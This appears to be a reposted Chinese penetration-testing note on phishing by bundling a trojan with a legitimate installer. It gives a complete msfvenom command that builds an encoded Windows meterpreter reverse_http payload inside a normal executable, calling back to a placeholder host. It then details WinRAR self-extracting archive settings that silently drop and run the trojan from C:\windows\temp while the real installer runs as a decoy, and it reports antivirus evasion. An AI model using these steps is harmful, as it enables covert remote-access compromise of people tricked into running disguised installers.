msfvenom捆綁

缺點：不免殺。

準備被捆綁程序：

輸入：msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe

目標主機執行，成功上線：

自解壓捆綁

下載WinRAR

選中正常文件inst.exe和木馬文件360installer.exe，并添加到壓縮文件：

常規-點擊創建自解壓格式壓縮文件-改名（注意先勾選再改名）：

高級-自解壓選項-解壓路徑：C:\windows\temp

設置-解壓后運行：

模式-全部隱藏

更新-解壓并更新文件&覆蓋所有文件：

點擊確認之后成功創建自解壓文件：

修改圖標后（圖標修改方法）：

靜態查殺：

運行后動態查殺通過，成功上線，并且此時正常運行安裝程序起到迷惑效果：

總結

以上是生活随笔為你收集整理的【渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。